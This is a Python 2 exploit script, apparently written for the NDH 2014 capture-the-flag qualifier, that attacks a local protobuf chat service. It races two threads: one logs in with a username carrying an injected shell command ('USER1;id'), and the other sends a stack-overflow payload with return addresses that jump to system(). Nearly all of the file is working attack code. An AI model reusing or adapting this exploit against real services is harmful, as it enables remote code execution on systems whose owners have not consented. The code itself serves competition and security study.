- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- # quals NDH 2014
- # Nibble Sploit
- # pollypocket - y0ug
- import time
- import curses
- import socket
- import chat_protocol_pb2
- from curses.textpad import rectangle
- from struct import pack
- import threading
- import signal
- import sys
- import threading
- import struct
class NetWrapper:
    """Minimal client for the chat service's length-prefixed protobuf framing.

    Every frame written to the socket is ``pack('<I', len(body)) + body``,
    where ``body`` is a one-character type tag ("1" for AuthPacket, "2" for
    ChatMessage) followed by the serialized protobuf.  The socket is created
    by :meth:`connect` and exposed as ``self.socket``; callers close it.
    """

    def __init__(self):
        # Nothing is initialised until connect() succeeds.
        pass

    def connect(self):
        """Open a TCP connection to 127.0.0.1:4567 with a 60 s timeout.

        Returns True and stores the socket on ``self.socket`` on success;
        returns False on any failure.  The bare ``except`` is kept from the
        original: it also swallows KeyboardInterrupt/SystemExit, so a
        Ctrl-C during connect is reported as "not connected" rather than
        stopping the program.
        """
        try:
            conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            conn.settimeout(60)
            conn.connect(("127.0.0.1", 4567))
            self.socket = conn
        except:
            return False
        return True

    def _send_frame(self, tag, message):
        """Write one frame: 4-byte little-endian length, type tag, protobuf bytes."""
        body = tag + message.SerializeToString()
        self.socket.send(pack('<I', len(body)) + body)

    def auth(self, username):
        """Send an AuthPacket for ``username`` and remember the name on the instance."""
        packet = chat_protocol_pb2.AuthPacket()
        packet.username = username
        self.username = username
        self._send_frame("1", packet)

    def wait_authresponse(self):
        """Read one TokenResponse from the socket.

        On ``authstatus == 1`` the token is stored on ``self.token`` and
        True is returned; otherwise False.  A single recv(1024) is assumed
        to hold the whole response -- the length prefix used on the send
        side is not parsed here.
        """
        reply = chat_protocol_pb2.TokenResponse()
        reply.ParseFromString(self.socket.recv(1024))
        if reply.authstatus != 1:
            return False
        self.token = reply.token
        return True

    def sendmessage(self, token, username, msg):
        """Send a ChatMessage carrying ``token`` as the cookie.

        Messages shorter than two characters are silently dropped, matching
        the original behaviour.
        """
        if len(msg) < 2:
            return
        message = chat_protocol_pb2.ChatMessage()
        message.cookie = token
        message.nickname = username
        message.textmessage = msg
        self._send_frame("2", message)
# Shared flag between the two worker threads: classic_user sets it while its
# connection is open and clears it after sending the auth frame; trigger_user
# blocks on event.wait() before sending.
event = threading.Event()
def _auth_round(client):
    """One iteration: flag the open connection, authenticate, unflag, close, pause.

    ``event`` is set before the auth frame goes out and cleared right after,
    so a waiter on ``event`` is released while this connection is live.
    """
    event.set()
    client.auth("USER1;id")
    event.clear()
    client.socket.close()
    time.sleep(2)


def classic_user():
    """Worker loop: reconnect and authenticate as "USER1;id" until connect() fails."""
    client = NetWrapper()
    while True:
        if not client.connect():
            break
        _auth_round(client)
def trigger_user():
    """Second worker: each time ``event`` is set, send one crafted frame and reconnect.

    The frame mirrors the client framing used in NetWrapper (4-byte
    little-endian length, then header, then body).  The numeric constants
    are specific to the 2014 challenge binary and carry no meaning outside it.
    """
    n1 = NetWrapper()
    while n1.connect():
        payload = "Z" * 125
        payload += struct.pack('<I', 0x8049d4d) # ret;
        payload += struct.pack('<I', 0x08048BD0) # jmp system
        l = len(payload)
        # Header is 0x31 0x0a followed by the body length as a single byte;
        # lengths from 0x80 to 0xff get a trailing 0x01, larger ones are not
        # sent at all.  With 125 + 8 = 133 bytes the second branch is taken.
        if l < 0x80:
            header = "\x31\x0a%c" % (chr(l))
        elif l < 0x100:
            header = "\x31\x0a%c\x01" % (chr(l))
        else:
            return
        pwn = struct.pack('<I', len(header+payload))
        pwn += header
        pwn += payload
        # Block until classic_user has opened its connection (it sets the
        # event just before sending its auth frame).
        event.wait()
        n1.socket.send(pwn)
        n1.socket.close()
        time.sleep(1)
if __name__ == "__main__":
    # Start the authenticating worker first, then the one that waits on
    # ``event``; only the second worker is joined, as in the original.
    workers = [
        threading.Thread(target=classic_user),
        threading.Thread(target=trigger_user),
    ]
    for worker in workers:
        worker.start()
    workers[1].join()